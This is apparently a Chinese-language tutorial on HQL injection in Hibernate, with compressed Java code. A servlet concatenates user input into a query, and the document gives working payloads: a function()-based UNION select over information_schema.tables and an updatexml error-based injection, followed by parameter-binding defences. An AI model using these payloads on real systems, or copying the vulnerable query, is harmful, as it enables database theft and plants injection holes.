Stringparameter=req.getParameter("name");Queryquery=session.createSQLQuery("SELECT table_name FROM information_schema.tables where table_schema=?");query.setParameter(1,parameter);
<hibernate-configuration><session-factory><!-- Database connection settings --><propertyname="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property><propertyname="hibernate.connection.url">jdbc:mysql://localhost:3306/testdb</property><propertyname="hibernate.connection.username">root</property><propertyname="hibernate.connection.password">password</property><!-- SQL dialect --><propertyname="hibernate.dialect">org.hibernate.dialect.MySQL8Dialect</property><!-- Echo all executed SQL to stdout --><propertyname="hibernate.show_sql">true</property><propertyname="hibernate.format_sql">true</property><!-- Drop and re-create the database schema on startup --><propertyname="hibernate.hbm2ddl.auto">update</property></session-factory></hibernate-configuration>
importjavax.persistence.*;@Entity@Table(name="users")publicclassUser{@Id@GeneratedValue(strategy=GenerationType.IDENTITY)privateintid;@Column(name="name")privateStringname;@Column(name="email")privateStringemail;// Getter and Setter for idpublicintgetId(){returnid;}publicvoidsetId(intid){this.id=id;}// Getter and Setter for namepublicStringgetName(){returnname;}publicvoidsetName(Stringname){this.name=name;}// Getter and Setter for emailpublicStringgetEmail(){returnemail;}publicvoidsetEmail(Stringemail){this.email=email;}// Optional: Override toString() for better logging@OverridepublicStringtoString(){return"User{"+"id="+id+", name='"+name+'\''+", email='"+email+'\''+'}';}}
importorg.hibernate.Session;importorg.hibernate.query.Query;publicclassMain{publicstaticvoidmain(String[]args){Sessionsession=HibernateUtil.getSessionFactory().openSession();session.beginTransaction();// HQL查询示例 Query<User>query=session.createQuery("FROM User WHERE email = :email",User.class);query.setParameter("email","test@example.com");Useruser=query.uniqueResult();System.out.println("User: "+user.getName());session.getTransaction().commit();session.close();}}
packagecom.example;importjavax.servlet.ServletException;importjavax.servlet.annotation.WebServlet;importjavax.servlet.http.HttpServlet;importjavax.servlet.http.HttpServletRequest;importjavax.servlet.http.HttpServletResponse;importjava.io.IOException;importjava.io.PrintWriter;importorg.hibernate.Session;importorg.hibernate.query.Query;@WebServlet("/user")publicclassUserServletextendsHttpServlet{@OverrideprotectedvoiddoGet(HttpServletRequestreq,HttpServletResponseresp)throwsServletException,IOException{resp.setContentType("text/plain");PrintWriterout=resp.getWriter();Stringparameter=req.getParameter("name");if(parameter==null||parameter.isEmpty()){out.println("Error: 'name' parameter is required.");return;}Sessionsession=HibernateUtil.getSessionFactory().openSession();session.beginTransaction();try{out.print("Hibernate Version: 5.6.15.Final\n\n");// Query<User> query = session.createQuery("FROM User WHERE name = :parameter", User.class);// query.setParameter("name", parameter);Query<User>query=session.createQuery("from User where name='"+parameter+"'",User.class);Useruser=query.uniqueResult();if(user!=null){out.println("com.example.User found: "+user.getName()+", Email: "+user.getEmail());}else{out.println("No user found with name: "+parameter);}session.getTransaction().commit();// } catch (Exception e) {// if (session.getTransaction() != null) {// session.getTransaction().rollback();// }// out.println("Error: " + e.getMessage());}finally{session.close();}}}
packagecom.example;importjavax.persistence.*;@Entity@Table(name="users")publicclassUser{@Id@GeneratedValue(strategy=GenerationType.IDENTITY)privateintid;@Column(name="name")privateStringname;@Column(name="email")privateStringemail;// Getters and SetterspublicintgetId(){returnid;}publicvoidsetId(intid){this.id=id;}publicStringgetName(){returnname;}publicvoidsetName(Stringname){this.name=name;}publicStringgetEmail(){returnemail;}publicvoidsetEmail(Stringemail){this.email=email;}}
<hibernate-configuration><session-factory><!-- Database connection settings --><propertyname="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property><propertyname="hibernate.connection.url">jdbc:mysql://localhost:3306/test</property><propertyname="hibernate.connection.username">root</property><propertyname="hibernate.connection.password">password</property><!-- SQL dialect --><propertyname="hibernate.dialect">org.hibernate.dialect.MySQL8Dialect</property><!-- Echo all executed SQL to stdout --><propertyname="hibernate.show_sql">true</property><propertyname="hibernate.format_sql">true</property><!-- Drop and re-create the database schema on startup --><propertyname="hibernate.hbm2ddl.auto">update</property><!-- 显式声明实体类 --><mappingclass="com.example.User"/></session-factory></hibernate-configuration>
Stringparameter=req.getParameter("name");Queryquery=session.createSQLQuery("SELECT table_name FROM information_schema.tables where table_schema='"+parameter+"'");
?name=test' and function('1=2unionselect1,table_name,table_schemafrominformation_schema.tables#')='
这里注意function函数会在后面添加一对括号,可以使用单行注释进行注释
通过function()方法,可以对任意表进行读取。
报错注入:
1
name=test' and FUNCTION('updatexml',1,concat('~',user(),'~'),1)=
HQL注入防御
HQL参数名称绑定
防御sql注入最好的办法就是预编译
1
2
3
Query query=session.createQuery(“from User user where user.name=:customername and user:customerage=:age ”);
query.setString(“customername”,name);
query.setInteger(“customerage”,age);
HQL参数位置邦定:
1
2
3
Query query=session.createQuery(“from User user where user.name=? and user.age =? ”);
query.setString(0,name);
query.setInteger(1,age);